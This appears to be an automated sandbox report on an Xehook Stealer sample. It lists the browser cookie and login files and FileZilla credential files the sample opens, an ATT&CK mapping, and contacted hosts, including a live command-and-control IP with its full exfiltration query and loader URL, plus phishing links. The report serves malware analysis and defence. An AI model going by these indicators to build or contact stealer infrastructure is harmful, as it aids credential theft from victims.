Source: Amcache.hve.2.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Xehook Stealer

Source: Yara match	File source: 1d0000.MSBuild.exe, type: SAMPLE
Source: Yara match	File source: 0.0.1d0000.MSBuild.exe.1c2541e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1395699284.000001C2541E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1527801649.000001C255E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1d0000.MSBuild.exe PID: 7416, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml			Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior

Source: Yara match

File source: Process Memory Space: 1d0000.MSBuild.exe PID: 7416, type: MEMORYSTR

Remote Access Functionality

Yara detected Xehook Stealer

Source: Yara match	File source: 1d0000.MSBuild.exe, type: SAMPLE
Source: Yara match	File source: 0.0.1d0000.MSBuild.exe.1c2541e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1395699284.000001C2541E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1527801649.000001C255E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1d0000.MSBuild.exe PID: 7416, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	11 Process Injection	1 Masquerading	2 OS Credential Dumping	231 Security Software Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	2 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	251 Virtualization/Sandbox Evasion	Security Account Manager	251 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	123 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
1d0000.MSBuild.exe	100%	Avira	BDS/Backdoor.Gen
1d0000.MSBuild.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://65.109.218.88	100%	Avira URL Cloud	malware
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	Avira URL Cloud	safe
http://65.109.218.88/	100%	Avira URL Cloud	malware
http://upx.sf.net	0%	Avira URL Cloud	safe
http://65.109.218.88/xh.php?id=208&build=nedr&passwords=0&cookies=2&username=user&country=US&ip=8.46.123.33&BSSID=d79588bde78585112204631caa39ca2b&wallets=0&token=xehook208828913883887&ext=0&filters=0&pcname=579569&cardsc=0&telegram=False&discord=False&steam=False&domaindetect=	100%	Avira URL Cloud	malware
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://yandex.com/support/smart-captcha/problems.html?form-unique_key=225b0967-11df21d1-b52d8c2e-3d	0%	Avira URL Cloud	safe
https://disk.yandex.com/showcaptcha?cc=1&mt=1B9EC1EB36A05FF151D32C1291C255F1500AFCBC8AB90758085DF922	0%	Avira URL Cloud	safe
https://www.ecosia.org/newtab/	0%	Avira URL Cloud	safe
https://yandex.com/support/common/browsers-settings/browsers-java-js-settings.html	0%	Avira URL Cloud	safe
https://disk.yandex.com(	0%	Avira URL Cloud	safe
https://disk.yandex.com	0%	Avira URL Cloud	safe
https://ac.ecosia.org/autocomplete?q=	0%	Avira URL Cloud	safe
https://yastatic.net/s3/home-static/_/90/9034470dfcb0bea0db29a281007b8a38.png	0%	Avira URL Cloud	safe
https://disk.yandex.com/d/hBX5q37QQyYzxw	0%	Avira URL Cloud	safe
http://disk.yandex.com	0%	Avira URL Cloud	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	Avira URL Cloud	safe
http://ip-api.com	0%	Avira URL Cloud	safe
http://ip-api.com/json/?fields=11827	0%	Avira URL Cloud	safe
http://65.109.218.88/getloader.php?id=208	100%	Avira URL Cloud	malware
http://65.109.218.88/xh.php?id=208&build=nedr&passwords=0&cookies=2&username=user&country=US&ip=8.	100%	Avira URL Cloud	malware
http://ip-api.com/line/?fields=hosting	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	Avira URL Cloud	safe
https://t.me/+w897k5UK_jIyNDgy	0%	Avira URL Cloud	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
disk.yandex.com	87.250.250.50	true	false	unknown
t.me	149.154.167.99	true	false	unknown
ip-api.com	208.95.112.1	true	false	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://65.109.218.88/xh.php?id=208&build=nedr&passwords=0&cookies=2&username=user&country=US&ip=8.46.123.33&BSSID=d79588bde78585112204631caa39ca2b&wallets=0&token=xehook208828913883887&ext=0&filters=0&pcname=579569&cardsc=0&telegram=False&discord=False&steam=False&domaindetect=	true	Avira URL Cloud: malware	unknown
http://65.109.218.88/	true	Avira URL Cloud: malware	unknown
https://disk.yandex.com/d/hBX5q37QQyYzxw	false	Avira URL Cloud: safe	unknown
http://ip-api.com/json/?fields=11827	false	Avira URL Cloud: safe	unknown
https://t.me/+w897k5UK_jIyNDgy	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	1d0000.MSBuild.exe, 00000000.00000002.1528794898.000001C265E11000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	1d0000.MSBuild.exe, 00000000.00000002.1528794898.000001C265E11000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	1d0000.MSBuild.exe, 00000000.00000002.1528794898.000001C265E11000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://yandex.com/support/smart-captcha/problems.html?form-unique_key=225b0967-11df21d1-b52d8c2e-3d	X9ZLAQA9VR.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	1d0000.MSBuild.exe, 00000000.00000002.1528794898.000001C265E11000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.2.dr	false	Avira URL Cloud: safe	unknown
http://65.109.218.88	1d0000.MSBuild.exe, 00000000.00000002.1527801649.000001C255ECD000.00000004.00000800.00020000.00000000.sdmp, 1d0000.MSBuild.exe, 00000000.00000002.1527801649.000001C255E70000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	1d0000.MSBuild.exe, 00000000.00000002.1528794898.000001C265E11000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	1d0000.MSBuild.exe, 00000000.00000002.1528794898.000001C265E11000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://disk.yandex.com/showcaptcha?cc=1&mt=1B9EC1EB36A05FF151D32C1291C255F1500AFCBC8AB90758085DF922	1d0000.MSBuild.exe, 00000000.00000002.1527801649.000001C255ECD000.00000004.00000800.00020000.00000000.sdmp, 1d0000.MSBuild.exe, 00000000.00000002.1527801649.000001C255E63000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	1d0000.MSBuild.exe, 00000000.00000002.1528794898.000001C265E11000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://yandex.com/support/common/browsers-settings/browsers-java-js-settings.html	1d0000.MSBuild.exe, 00000000.00000002.1527801649.000001C255E50000.00000004.00000800.00020000.00000000.sdmp, 1d0000.MSBuild.exe, 00000000.00000002.1527801649.000001C255ECD000.00000004.00000800.00020000.00000000.sdmp, X9ZLAQA9VR.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://yastatic.net/s3/home-static/_/90/9034470dfcb0bea0db29a281007b8a38.png	1d0000.MSBuild.exe, 00000000.00000002.1527801649.000001C255ECD000.00000004.00000800.00020000.00000000.sdmp, X9ZLAQA9VR.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://disk.yandex.com(	1d0000.MSBuild.exe, 00000000.00000002.1527801649.000001C255ECD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://disk.yandex.com	1d0000.MSBuild.exe, 00000000.00000002.1527801649.000001C255ECD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	1d0000.MSBuild.exe, 00000000.00000002.1528794898.000001C265E11000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://disk.yandex.com	1d0000.MSBuild.exe, 00000000.00000002.1527801649.000001C255ECD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://65.109.218.88/xh.php?id=208&build=nedr&passwords=0&cookies=2&username=user&country=US&ip=8.	1d0000.MSBuild.exe, 00000000.00000002.1527801649.000001C255E70000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ip-api.com	1d0000.MSBuild.exe, 00000000.00000002.1527801649.000001C255E70000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://65.109.218.88/getloader.php?id=208	1d0000.MSBuild.exe, 00000000.00000002.1527801649.000001C255ECD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	1d0000.MSBuild.exe, 00000000.00000002.1527801649.000001C255E01000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	1d0000.MSBuild.exe, 00000000.00000002.1528794898.000001C265E11000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ip-api.com/line/?fields=hosting	1d0000.MSBuild.exe	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
87.250.250.50	disk.yandex.com	Russian Federation	13238	YANDEXRU	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false
65.109.218.88	unknown	United States	11022	ALABANZA-BALTUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1504858
Start date and time:	2024-09-05 14:28:13 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	1d0000.MSBuild.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/8@3/4
EGA Information:	Failed
HCA Information:	Successful, ratio: 98% Number of executed functions: 4 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 52.165.165.26, 192.229.221.95, 52.165.164.15
Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 1d0000.MSBuild.exe, PID 7416 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: 1d0000.MSBuild.exe

Simulations

Behavior and APIs

Time	Type	Description
08:29:11	API Interceptor	96x Sleep call for process: 1d0000.MSBuild.exe modified
08:29:21	API Interceptor	9x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	DurU4rqap1.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Hoodbyunlock.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	x.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	UpdateMe.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json/
	Windows Security.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	xclient.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	XClient.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	25QpgTIExG.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	7ITEwXm2Pk.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	hXpZpdaEVk.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
87.250.250.50	https://disk.yandex.ru/d/ArN8zL4WbJeexQ	Get hash	malicious	Panda Stealer	Browse
	https://disk.yandex.ru/d/4c-WMbXQ_7FSNQ	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	DanaBot, SmokeLoader	Browse
	file.exe	Get hash	malicious	DanaBot, SmokeLoader	Browse
	file.exe	Get hash	malicious	DanaBot, SmokeLoader	Browse
	file.exe	Get hash	malicious	DanaBot, SmokeLoader	Browse
	kHwr2I72nw.exe	Get hash	malicious	DanaBot, SmokeLoader	Browse
	XmVwvFw7m1.exe	Get hash	malicious	DanaBot, SmokeLoader	Browse
	I9EfFMVCcJ.exe	Get hash	malicious	DanaBot, SmokeLoader	Browse
	file.exe	Get hash	malicious	DanaBot, SmokeLoader	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
t.me	https://telegra.ph/Payroll-Department-08-30	Get hash	malicious	HTMLPhisher	Browse	149.154.167.99
	https://wzi.xwi.mybluehost.me/servizi/brt/	Get hash	malicious	Unknown	Browse	162.241.217.102
	https://xop.cjm.mybluehost.me/epubs/2022/AFI/shelves/22Q2-AFI-Motion-Shelf/	Get hash	malicious	Phisher	Browse	66.235.200.146
	https://xop.cjm.mybluehost.me/epubs/2022/AFI/shelves/22Q2-AFI-Motion-Shelf/	Get hash	malicious	Phisher	Browse	66.235.200.146
	https://s.craft.me/ZspaXX16LRR18X	Get hash	malicious	Unknown	Browse	172.67.142.67
	1d0000.MSBuild.exe	Get hash	malicious	Xehook Stealer	Browse	149.154.167.99
	66d5ddcec1520_shtr.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	149.154.167.99
	66d5ddcbb9f86_vyre.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.99
	https://phy.lew.mybluehost.me/wp-content/plugins/L/LM/TU17HLK/	Get hash	malicious	Unknown	Browse	50.87.169.246
	https://found.ee/5PKNr	Get hash	malicious	Unknown	Browse	185.129.100.126
ip-api.com	DurU4rqap1.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Hoodbyunlock.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	x.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	UpdateMe.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	Windows Security.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	xclient.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	XClient.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	http://readabilityscore.com	Get hash	malicious	Unknown	Browse	51.77.64.70
	25QpgTIExG.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	7ITEwXm2Pk.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
fp2e7a.wpc.phicdn.net	http://beonlineboo.com	Get hash	malicious	Unknown	Browse	192.229.221.95
	New Order Inquiry Maiden Med Sept 2024 #287772.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	192.229.221.95
	http://cdn.btmessage.com	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	https://inboxsender.gxsearch.club/redir5/serial.php	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://www.sharepointle.com/nam/b7c7f9fb-10af-4a78-b055-1aae28072d54/63ec8c0e-31c8-42ea-a890-b6ee6a16a759/8ca39e5f-fb4f-4462-a716-7a468ff934d1/login?id=M3JjNFNGc2tnZHFtT29GMmRvdXdkdWJaU2hKa214Uk5hc2szK1RuV1Y3NHJKY1hxV01BcVZZeFdWVXJ1SUgwU0pEc2JLRGIyTUVLL1hVZzBMUkhtdjNqY2ZUdy9tV1k5N0I4ZGtFS3dCQlBPV29udmRXMjUzb1pTTjl4NkxJQnQyS3RRQkV0U2gwTTJ6SkZwMUhXV1FaUGRSRmg5NEJGcmpLem8zYlNtR05LTGZRZGRYMHJ0QmRncXR1R0xGYnpnYVFweEZ4Mkcvb2xMcnNZNEdLRUxFcy9vaWNIQ3N3eXhwbFdkVVFrWHVrRXM1OXJiUzVaQWtCTE1QM1RvYmNGdXJzTzViblB1S2RlYm9zVHh2RUJ2QmFtUDRBcG9pZS9qZnU2UnR3V0o1NWVQRGJCQThxbnhXV2RaWTRsb3BpN3dpM3g5ZWk2dkVCbHN3SWtpSEUvT3phS3p6SkZndW83SzRwK241Y1U1N25pQSt6ZE1KL1QvZmMyeEc5c0pzcFRWYi85UmtJS1M2WmpUajFpaC9aL0hSRytJY2ZWbkw3bEw3Q2lyc1ljVk5NQT0	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://ewares.penelitianilmiah.com/fe343few/	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://augeanremittancedata647489329364783926443292837.s3.ap-southeast-2.amazonaws.com/rer6t7yuhyvfy.htm	Get hash	malicious	Unknown	Browse	192.229.221.95
	SecuriteInfo.com.Win32.PWSX-gen.19998.16259.exe	Get hash	malicious	RHADAMANTHYS	Browse	192.229.221.95
	https://complaint.room2222.world/apartment/98754	Get hash	malicious	Unknown	Browse	192.229.221.95
	PO #86637.exe	Get hash	malicious	FormBook	Browse	192.229.221.95

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	New Order Inquiry Maiden Med Sept 2024 #287772.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PO2021080127.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Alexander - Particulars(0)(8).xlsx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	ELITE DIVA PARTICULARS.docx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SWIFT.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	XClient.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	SecuriteInfo.com.Win32.PWSX-gen.12778.1808.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Shipment Document BLINV and packing list_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	QTN-24003807.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://telegra.ph/Payroll-Department-08-30	Get hash	malicious	HTMLPhisher	Browse	149.154.167.99
YANDEXRU	RANGLANDLAW.xlsx	Get hash	malicious	Unknown	Browse	213.180.193.90
	http://draggedline.org	Get hash	malicious	Unknown	Browse	77.88.21.119
	https://demo.testfire.net/login.jsp	Get hash	malicious	Unknown	Browse	77.88.21.119
	SecuriteInfo.com.W32.PossibleThreat.16557.7011.msi	Get hash	malicious	Unknown	Browse	5.45.247.52
	https://trk.pmifunds.com/y.z?l=http://security1.b-cdn.net&j=375634604&e=3028&p=1&t=h&D6EBE0CCEBB74CE191551D6EE653FA1E	Get hash	malicious	HTMLPhisher	Browse	5.255.255.77
	SBSLMD5qhm.msi	Get hash	malicious	Metasploit	Browse	5.255.255.77
	https://oh3y.ulvantiro.su/82xG/	Get hash	malicious	HTMLPhisher	Browse	5.255.255.77
	https://steamcommmuinity.com/user1298323/action	Get hash	malicious	Unknown	Browse	93.158.134.242
	Remittance 728 Norriselectric0032xslx.pdf	Get hash	malicious	HTMLPhisher	Browse	77.88.44.55
	https://lenta.ru/articles/2023/01/13/darkpr/	Get hash	malicious	HTMLPhisher	Browse	5.255.255.77
ALABANZA-BALTUS	http://draggedline.org	Get hash	malicious	Unknown	Browse	65.109.16.84
	1d0000.MSBuild.exe	Get hash	malicious	Xehook Stealer	Browse	65.109.242.248
	87890090.exe	Get hash	malicious	Remcos	Browse	64.176.178.205
	d3d9x.dll	Get hash	malicious	Xehook Stealer	Browse	65.109.242.248
	400000.MSBuild.exe	Get hash	malicious	Xehook Stealer	Browse	65.109.242.248
	400000.MSBuild.exe	Get hash	malicious	Xehook Stealer	Browse	65.109.242.248
	055vyXXRAq.ps1	Get hash	malicious	NetSupport Downloader	Browse	65.108.196.136
	y9sjRRM6Eu.ps1	Get hash	malicious	NetSupport Downloader	Browse	65.108.196.136
	oKPWwo5MlC.ps1	Get hash	malicious	NetSupport Downloader	Browse	65.108.196.136
	9csCO0ApAw.ps1	Get hash	malicious	NetSupport Downloader	Browse	65.108.196.136
TUT-ASUS	DurU4rqap1.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Hoodbyunlock.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	x.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	UpdateMe.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	Windows Security.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	xclient.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	XClient.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	http://readabilityscore.com	Get hash	malicious	Unknown	Browse	208.95.112.2
	25QpgTIExG.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	7ITEwXm2Pk.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	http://cdn.btmessage.com	Get hash	malicious	HTMLPhisher	Browse	23.206.229.226
	RANGLANDLAW.xlsx	Get hash	malicious	Unknown	Browse	23.206.229.226
	http://mentmaskloegionn.gitbook.io/us/	Get hash	malicious	Unknown	Browse	23.206.229.226
	http://pub-ca22a10ffb7349aca30da700c49a0d87.r2.dev/index.html	Get hash	malicious	Unknown	Browse	23.206.229.226
	https://qt6ata.shop/?dre=f06d4	Get hash	malicious	Unknown	Browse	23.206.229.226
	http://pub-5f9157fad7fd426bad68e1875cc4842e.r2.dev/uhtdex.html	Get hash	malicious	Unknown	Browse	23.206.229.226
	http://pub-33cba1b1aa61453b9e89a582d09f5287.r2.dev/index.html	Get hash	malicious	Unknown	Browse	23.206.229.226
	http://opposite-test-user-admin.surge.sh/index.html	Get hash	malicious	Unknown	Browse	23.206.229.226
	http://coibicxsigninlogin.gitbook.io/	Get hash	malicious	Unknown	Browse	23.206.229.226
	http://pub-719c8fa48daf46c3b7652581c04f08c2.r2.dev/zzzzzzzzzzz01.html	Get hash	malicious	HTMLPhisher	Browse	23.206.229.226
3b5074b1b5d032e5620f69f9f700ff0e	New Order Inquiry Maiden Med Sept 2024 #287772.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	87.250.250.50 149.154.167.99
	Documenti di spedizione 0002838844.exe	Get hash	malicious	AgentTesla	Browse	87.250.250.50 149.154.167.99
	PO2021080127.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	87.250.250.50 149.154.167.99
	Alexander - Particulars(0)(8).xlsx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	87.250.250.50 149.154.167.99
	ELITE DIVA PARTICULARS.docx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	87.250.250.50 149.154.167.99
	SWIFT.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	87.250.250.50 149.154.167.99
	invoice.exe	Get hash	malicious	MinerDownloader, RedLine, Xmrig	Browse	87.250.250.50 149.154.167.99
	RedEngine.exe	Get hash	malicious	Babadeda, RedLine	Browse	87.250.250.50 149.154.167.99
	nkVQ.exe	Get hash	malicious	AgentTesla	Browse	87.250.250.50 149.154.167.99
	http://warinice.ac.th/h/d/paiement.php	Get hash	malicious	Unknown	Browse	87.250.250.50 149.154.167.99

Process:	C:\Users\user\Desktop\1d0000.MSBuild.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1498
Entropy (8bit):	5.364175471524945
Encrypted:	false
